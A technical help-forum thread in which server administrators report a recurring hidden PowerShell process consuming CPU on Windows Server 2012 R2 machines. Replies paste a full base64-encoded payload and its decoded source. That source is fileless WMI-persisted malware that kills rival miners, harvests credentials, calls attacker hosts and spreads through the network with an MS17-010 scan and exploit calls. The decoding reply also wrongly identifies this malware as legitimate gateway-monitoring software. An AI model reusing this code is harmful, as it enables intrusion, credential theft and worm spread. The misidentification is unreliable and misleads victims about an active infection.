none
Powershell high CPU end task every 90 minutes

    General discussion

  • Can someone please help. The following powershell keeps showing up about every 90 minutes and consumes all of the CPU:

    powershell -nop -nonl -w hidden "$mon = ([wmiclass] 'root\default:win32_taskservice').properties['mon'].value;$funs = ([wmiclass] 'root\default:win32_taskservice').properties['funs'].Value;iex 9[syste,.text.encoding]::ascii.getstring([system.convert]::fromba

    This is happening on 3 separate servers. 2 are AWS VM Servers and the other is a physical server at the customer location. All servers are running windows2012 r2 with the latest updates.

    • Changed type jrv Friday, March 30, 2018 1:16 PM
    • Moved by jrv Friday, March 30, 2018 1:17 PM Not a scipting issue
    Wednesday, October 25, 2017 7:01 PM

All replies

  • Not a scripting issue.  Something is scheduling this every hour. This is probably normal.  Check the task scheduler on all systems.

    \_(ツ)_/

    Wednesday, October 25, 2017 7:06 PM
  • You're infected with a virus, it's turning the servers into miners to mine for example bitcoin, monero and so on. Google fileless malware and powershell.

    You can test it by removing the "-w hidden" and run it in the commandprompt, it will show you what it does.


    • Edited by Marc-1983 Wednesday, October 25, 2017 7:41 PM
    Wednesday, October 25, 2017 7:41 PM
  • I scanned all 3 servers with Malwarebytes and they came back clean.
    Wednesday, October 25, 2017 7:55 PM
  • Hi,

    I agree with jrv.

    Have you checked the Task Scheduler? In this case, I recommend you could also have a try to capture the system status by using Process Monitor to figure what happened every 90 minutes. You may download the Process Monitor through the following link:
    https://www.microsoft.com/en-us/download/details.aspx?id=4865

    If you need further help, please feel free to let us know.

    Best Regards,
    Albert Ling

    Please remember to mark the replies as an answers if they help and unmark them if they provide no help.
    If you have feedback for TechNet Subscriber Support, contact tnmff@microsoft.com.

    Thursday, October 26, 2017 4:47 AM
  • Hello. Same problem here, any solution out there? Same OS Win2012 R2

    The Powershell command is a bit different

    powershell -nop -nonl -w hidden "$mon = ([wmiclass] 'root\default:win32_taskservice').properties['mon'].value;$funs = ([wmiclass] 'root\default:win32_taskservice').properties['funs'].Value;iex ([system.text.encoding]::ASCII.getstring([system.convert]::frombase64.

    Did full virusscan and could not find anything.

    Thank you

    Friday, October 27, 2017 5:20 PM
  • This is not a runnable script.  Half of it is missing.

    There is no such WMI class as referenced in the script.

    This may be a scheduled task created by a third party tool.  Y0u need to track down the process that is running this and you need to capture the whole script.

    Here is what you posted as the script.

    $mon = ([wmiclass]'root\default:win32_taskservice').properties['mon'].value
    $funs = ([wmiclass] 'root\default:win32_taskservice').properties['funs'].Value
    iex ([system.text.encoding]::ASCII.getstring([system.convert]::frombase64

    This cannot do anything as posted.  The last incomplete command is:

    [system.convert]::FromBase64String()  - notice the missing parts.


    \_(ツ)_/

    Friday, October 27, 2017 5:28 PM
  • I have similar problems on windows servers from 2008 to 2012r2, get on every hour two powershell processes that take 50% of CPU

    powershell.exe             powershell.exe -NoP -NonI -W Hidden  -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgAzADIAXwBUAGEAcwBrAFMAZQByAHYAaQBjAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUAIAAgACAAIAAgACAAIAAgAA0ACgAkAGQAZQBmAHUAbgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZgB1AG4AcwApACkADQAKAGkAZQB4ACAAJABkAGUAZgB1AG4ADQAKAA0ACgBHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAXwBfAEYAaQBsAHQAZQByAFQAbwBDAG8AbgBzAHUAbQBlAHIAQgBpAG4AZABpAG4AZwAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGYAaQBsAHQAZQByACAALQBuAG8AdABtAGEAdABjAGgAIAAnAFMAQwBNACAARQB2AGUAbgB0ACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcAAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHAAJwB9AA0ACgBpAGYAIAAoACEAKAB0AGUAcwB0AC0AcABhAHQAaAAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQApACkADQAKAHsAcwBlAG4AdABmAGkAbABlACAAKAAkAGQAaQByAHAAYQB0AGgAKwAnAFwAbQBzAHYAYwByADEAMgAwAC4AZABsAGwAJwApACAAJwB2AGMAcgAnAH0ADQAKAA0ACgBbAGEAcgByAGEAeQBdACQAcABzAGkAZABzAD0AIABnAGUAdAAtAHAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAfABzAG8AcgB0ACAAYwBwAHUAIAAtAEQAZQBzAGMAZQBuAGQAaQBuAGcAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AaQBkAH0ADQAKACQAdABjAHAAYwBvAG4AbgAgAD0AIABuAGUAdABzAHQAYQB0ACAALQBhAG4AbwBwACAAdABjAHAAIAANAAoAJABlAHgAaQBzAHQAPQAkAEYAYQBsAHMAZQANAAoAaQBmACAAKAAkAHAAcwBpAGQAcwAgAC0AbgBlACAAJABuAHUAbABsACAAKQANAAoAewANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AZQBxACAAJABuAHUAbABsACkADQAKACAAIAAgACAAIAAgACAAIAB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoACQAcABzAGkAZABzAFsAMABdACAALQBlAHEAIAAkAGwAaQBuAGUAWwAtADEAXQApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADUANQAiACkALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA3ADcANwA3ACIAKQApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABlAHYAaQBkAD0AJABsAGkAbgBlAFsALQAxAF0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AaQBkACAAJABlAHYAaQBkACAAfAAgAHMAdABvAHAALQBwAHIAbwBjAGUAcwBzACAALQBmAG8AcgBjAGUADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAGkAZgAgACgAIQAkAGUAeABpAHMAdAAgAC0AYQBuAGQAIAAoACQAcABzAGkAZABzAC4AYwBvAHUAbgB0ACAALQBsAGUAIAA4ACkAKQANAAoAewAgACAAIAANAAoAIAAgACAAIAAkAGMAbQBkAG0AbwBuAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBOAG8AUAAgAC0ATgBvAG4ASQAgAC0AVwAgAEgAaQBkAGQAZQBuACAAYAAiAGAAJABtAG8AbgAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAVwBpAG4AMwAyAF8AVABhAHMAawBTAGUAcgB2AGkAYwBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AbwBuACcAXQAuAFYAYQBsAHUAZQA7AGAAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgAzADIAXwBUAGEAcwBrAFMAZQByAHYAaQBjAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUAIAA7AGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABgACQAZgB1AG4AcwApACkAKQA7AEkAbgB2AG8AawBlAC0AQwBvAG0AbQBhAG4AZAAgACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIABgACQAUgBlAG0AbwB0AGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAEAAKABgACQAbQBvAG4ALAAgAGAAJABtAG8AbgAsACAAJwBWAG8AaQBkACcALAAgADAALAAgACcAJwAsACAAJwAnACkAYAAiACIADQAKACAAIAAgACAASQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AYwBsAGEAcwBzACAAdwBpAG4AMwAyAF8AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAGMAcgBlAGEAdABlACAALQBBAHIAZwB1AG0AZQBuAHQAbABpAHMAdAAgACQAYwBtAGQAbQBvAG4ADQAKAH0ADQAKAA0ACgAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAJABtAGkAbQBpACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgAzADIAXwBUAGEAcwBrAFMAZQByAHYAaQBjAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBpAG0AaQAnAF0ALgBWAGEAbAB1AGUAIAANAAoAJABhACwAIAAkAE4AVABMAE0APQAgAEcAZQB0AC0AYwByAGUAZABzACAAJABtAGkAbQBpACAAJABtAGkAbQBpAA0ACgAgACAAIAAgACAAIAAgAA0ACgAkAE4AZQB0AHcAbwByAGsAcwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATgBlAHQAdwBvAHIAawBBAGQAYQBwAHQAZQByAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AIAAtAEUAQQAgAFMAdABvAHAAIAB8ACAAPwAgAHsAJABfAC4ASQBQAEUAbgBhAGIAbABlAGQAfQAgACAAIAAgAA0ACgAkAGkAcABzAHUAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFcAaQBuADMAMgBfAFQAYQBzAGsAUwBlAHIAdgBpAGMAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpAHAAcwB1ACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGkAMQA3ACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgAzADIAXwBUAGEAcwBrAFMAZQByAHYAaQBjAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQAxADcAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFcAaQBuADMAMgBfAFQAYQBzAGsAUwBlAHIAdgBpAGMAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlACAADQAKAFsAYgB5AHQAZQBbAF0AXQAkAHMAYwA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHMAYwBiAGEAKQAgACAADQAKAA0ACgAkAHMAZQA9AEAAKAAnAHMAdABhAGYAZgB0AGUAcwB0AC4AcwBwAGQAbgBzAC4AZQB1ACcALAAnAHMAdABhAGYAZgB0AGUAcwB0AC4AZgBpAHIAZQB3AGEAbABsAC0AZwBhAHQAZQB3AGEAeQAuAGMAbwBtACcALAAnADEAMAA3AC4AMQA3ADkALgA2ADcALgAyADQAMwAnACkADQAKACQAbgBpAGMAPQAnADEAMQA4AC4AMQA4ADQALgA0ADgALgA5ADUAJwANAAoAZgBvAHIAZQBhAGMAaAAoACQAdAAgAGkAbgAgACQAcwBlACkADQAKAHsADQAKAAkAJABwAGkAbgA9AHQAZQBzAHQALQBjAG8AbgBuAGUAYwB0AGkAbwBuACAAJAB0AA0ACgAJAGkAZgAgACgAJABwAGkAbgAgAC0AbgBlACAAJABuAHUAbABsACkADQAKAAkAewANAAoACQAJACQAbgBpAGMAPQAkAHQADQAKAAkACQBiAHIAZQBhAGsADQAKAAkAfQANAAoAfQANAAoAJABuAGkAYwA9ACQAbgBpAGMAKwAiADoAOAAwADAAMAAiAA0ACgANAAoAIAAgACAADQAKAGYAbwByAGUAYQBjAGgAIAAoACQATgBlAHQAdwBvAHIAawAgAGkAbgAgACQATgBlAHQAdwBvAHIAawBzACkAIAANAAoAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAANAAoAIAAgACAAIAAkAEkAUABBAGQAZAByAGUAcwBzACAAIAA9ACAAJABOAGUAdAB3AG8AcgBrAC4ASQBwAEEAZABkAHIAZQBzAHMAWwAwAF0AIAAgAA0ACgAJAGkAZgAgACgAJABJAFAAQQBkAGQAcgBlAHMAcwAgAC0AbQBhAHQAYwBoACAAJwBeADEANgA5AC4AMgA1ADQAJwApAHsAYwBvAG4AdABpAG4AdQBlAH0AIAAJAA0ACgAgACAAIAAgACQAUwB1AGIAbgBlAHQATQBhAHMAawAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAUABTAHUAYgBuAGUAdABbADAAXQAgACAADQAKACAAIAAgACAAJABpAHAAcwA9AEcAZQB0AC0ATgBlAHQAdwBvAHIAawBSAGEAbgBnAGUAIAAkAEkAUABBAGQAZAByAGUAcwBzACAAJABTAHUAYgBuAGUAdABNAGEAcwBrAA0ACgAJACQAdABjAHAAYwBvAG4AbgAgAD0AIABuAGUAdABzAHQAYQB0ACAALQBhAG4AbwBwACAAdABjAHAAIAANAAoACQBmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACEAKAAkAGwAaQBuAGUAIAAtAGkAcwAgAFsAYQByAHIAYQB5AF0AKQApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQBpAGYAIAAoACQAbABpAG4AZQAuAGMAbwB1AG4AdAAgAC0AbABlACAANAApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQAkAGkAPQAkAGwAaQBuAGUAWwAtADMAXQAuAHMAcABsAGkAdAAoACcAOgAnACkAWwAwAF0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACAAKAAkAGwAaQBuAGUAWwAtADIAXQAgAC0AZQBxACAAJwBFAFMAVABBAEIATABJAFMASABFAEQAJwApACAALQBhAG4AZAAgACAAKAAkAGkAIAAtAG4AZQAgACcAMQAyADcALgAwAC4AMAAuADEAJwApACAALQBhAG4AZAAgACgAJABpAHAAcwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBwAHMAKwA9ACQAaQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJABpAHAAIABpAG4AIAAkAGkAcABzACkADQAKACAAIAAgACAAewAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAAtACQAcwB0AGkAbQBlACkALwAxADAAMAAwACAALQBnAHQAIAA1ADQAMAAwACkAewBiAHIAZQBhAGsAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpAHAAIAAtAGUAcQAgACQASQBQAEEAZABkAHIAZQBzAHMAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKABUAGUAcwB0AC0AQwBvAG4AbgBlAGMAdABpAG8AbgAgACQAaQBwACAALQBjAG8AdQBuAHQAIAAxACkAIAAtAG4AZQAgACQAbgB1AGwAbAAgACAALQBhAG4AZAAgACQAaQBwAHMAdQAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQAgAA0ACgAgACAAIAAgACAAIAAgACAAewAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAByAGUAPQAwAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAYQAuAGMAbwB1AG4AdAAgAC0AbgBlACAAMAApACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7ACQAcgBlACAAPQAgAHQAZQBzAHQALQBpAHAAIAAtAGkAcAAgACQAaQBwACAALQBjAHIAZQBkAHMAIAAkAGEAIAAgAC0AbgBpAGMAIAAkAG4AaQBjACAALQBuAHQAbABtACAAJABOAFQATABNACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAHIAZQAgAC0AZQBxACAAMQApAHsAJABpAHAAcwB1ACAAPQAkAGkAcABzAHUAIAArACIAIAAiACsAJABpAHAAfQANAAoACQAJAAkAZQBsAHMAZQANAAoACQAJAAkAewANAAoACQAJAAkACQAkAHYAdQBsAD0AWwBQAGkAbgBnAEMAYQBzAHQAbABlAC4AUwBjAGEAbgBuAGUAcgBzAC4AbQAxADcAcwBjAF0AOgA6AFMAYwBhAG4AKAAkAGkAcAApAAkACQAJAAkADQAKAAkACQAJAAkAaQBmACAAKAAkAHYAdQBsACAALQBhAG4AZAAgACQAaQAxADcAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAcgBlAHMAPQBlAGIANwAgACQAaQBwACAAJABzAGMADQAKAAkACQAJAAkACQBpAGYAIAAoACQAcgBlAHMAIAAtAG4AZQAgACQAdAByAHUAZQApAA0ACgAJAAkACQAJAAkAewBlAGIAOAAgACQAaQBwACAAJABzAGMAfQANAAoACQAJAAkACQAJACQAaQAxADcAIAA9ACAAJABpADEANwAgACsAIAAiACAAIgArACQAaQBwAA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAfQAgACAAIAAgACAAIAAgAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMAKAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAVwBpAG4AMwAyAF8AVABhAHMAawBTAGUAcgB2AGkAYwBlACcAKQAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUwBlAHQAUAByAG8AcABlAHIAdAB5AFYAYQBsAHUAZQAoACcAaQBwAHMAdQAnACAALAAkAGkAcABzAHUAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBQAHUAdAAoACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUwBlAHQAUAByAG8AcABlAHIAdAB5AFYAYQBsAHUAZQAoACcAaQAxADcAJwAgACwAJABpADEANwApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQA=       

    powershell.exe             powershell -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"    

    And they seem to last for hours, until I kill them, wireshark does not catch any outside traffic that is not what I can explain. But for powershell processes can't seem to find the origin. 
    Saturday, October 28, 2017 4:17 PM
  • Have you looked in task scheduler for this?


    \_(ツ)_/

    Saturday, October 28, 2017 4:32 PM
  • Here is the code being executed in the encoded string:

    $stime=[Environment]::TickCount
    $funs = ([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value        
    $defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
    iex $defun
    
    Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'SCM Event'} |Remove-WmiObject
    $dirpath=$env:SystemRoot+'\system32'   
    if  (!(test-path $dirpath )){
    	$dirpath=$env:SystemRoot
    }
    if (!(test-path ($dirpath+'\msvcp120.dll')))
    {sentfile ($dirpath+'\msvcp120.dll') 'vcp'}
    if (!(test-path ($dirpath+'\msvcr120.dll')))
    {sentfile ($dirpath+'\msvcr120.dll') 'vcr'}
    
    [array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
    $tcpconn = netstat -anop tcp 
    $exist=$False
    if ($psids -ne $null )
    {
        foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if ($line -eq $null)
            {continue}
            if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and $t.contains(":80 ") )
            {
                $exist=$true
                break
            }
        }
    }
    foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if (!($line -is [array])){continue}
            if (($line[-3].contains(":3333") -or $line[-3].contains(":5555")-or $line[-3].contains(":7777")) -and $t.contains("ESTABLISHED"))
            {
                $evid=$line[-1]
                Get-Process -id $evid | stop-process -force
            }
        }
    if (!$exist -and ($psids.count -le 8))
    {   
        $cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
        Invoke-WmiMethod -class win32_process -name create -Argumentlist $cmdmon
    }
    
    $NTLM=$False
    $mimi = ([WmiClass] 'root\default:Win32_TaskService').Properties['mimi'].Value 
    $a, $NTLM= Get-creds $mimi $mimi
           
    $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled}    
    $ipsu = ([WmiClass] 'root\default:Win32_TaskService').Properties['ipsu'].Value 
    $i17 = ([WmiClass] 'root\default:Win32_TaskService').Properties['i17'].Value 
    $scba= ([WmiClass] 'root\default:Win32_TaskService').Properties['sc'].Value 
    [byte[]]$sc=[System.Convert]::FromBase64String($scba)  
    
    $se=@('stafftest.spdns.eu','stafftest.firewall-gateway.com','107.179.67.243')
    $nic='118.184.48.95'
    foreach($t in $se)
    {
    	$pin=test-connection $t
    	if ($pin -ne $null)
    	{
    		$nic=$t
    		break
    	}
    }
    $nic=$nic+":8000"
    
       
    foreach ($Network in $Networks) 
    {            
        
        $IPAddress  = $Network.IpAddress[0]  
    	if ($IPAddress -match '^169.254'){continue} 	
        $SubnetMask  = $Network.IPSubnet[0]  
        $ips=Get-NetworkRange $IPAddress $SubnetMask
    	$tcpconn = netstat -anop tcp 
    	foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if (!($line -is [array])){continue}
    		if ($line.count -le 4){continue}
    		$i=$line[-3].split(':')[0]
            if ( ($line[-2] -eq 'ESTABLISHED') -and  ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
            {
                $ips+=$i
            }
        }
        if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
        foreach ($ip in $ips)
        {   
            if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
            if ($ip -eq $IPAddress){continue}     
            if ((Test-Connection $ip -count 1) -ne $null  -and $ipsu -notcontains $ip) 
            {   
                $re=0
                if ($a.count -ne 0)      
                {$re = test-ip -ip $ip -creds $a  -nic $nic -ntlm $NTLM }
                if ($re -eq 1){$ipsu =$ipsu +" "+$ip}
    			else
    			{
    				$vul=[PingCastle.Scanners.m17sc]::Scan($ip)				
    				if ($vul -and $i17 -notcontains $ip)
    				{
    					$res=eb7 $ip $sc
    					if ($res -ne $true)
    					{eb8 $ip $sc}
    					$i17 = $i17 + " "+$ip
    				}
    			}
            }
        }
     }       
    $StaticClass=New-Object Management.ManagementClass('root\default:Win32_TaskService')  
    $StaticClass.SetPropertyValue('ipsu' ,$ipsu)
    $StaticClass.Put()
    $StaticClass.SetPropertyValue('i17' ,$i17)
    $StaticClass.Put()

    Apparently you have installed gateway monitoring and reporting software.  This is part of the monitoring reporting service and appears to be collecting statistics and possibly connection info. 

    These  seem to be the guys who own this: http://www.centiant.co.uk/secure-firewall-gateway-service/

    Many corporations route all traffic through a remote gateway that acts as a very sophisticated public firewall.   This appears to be part of their system

    Have you installed a demo at some time.  Perhaps uninstalling the demo fails to remove these components.

    Check WMI for the WMI class mof and see the copyright and author to see the source of the class.  The class is not a Microsoft class.  It is a third party class that should not be named as named.

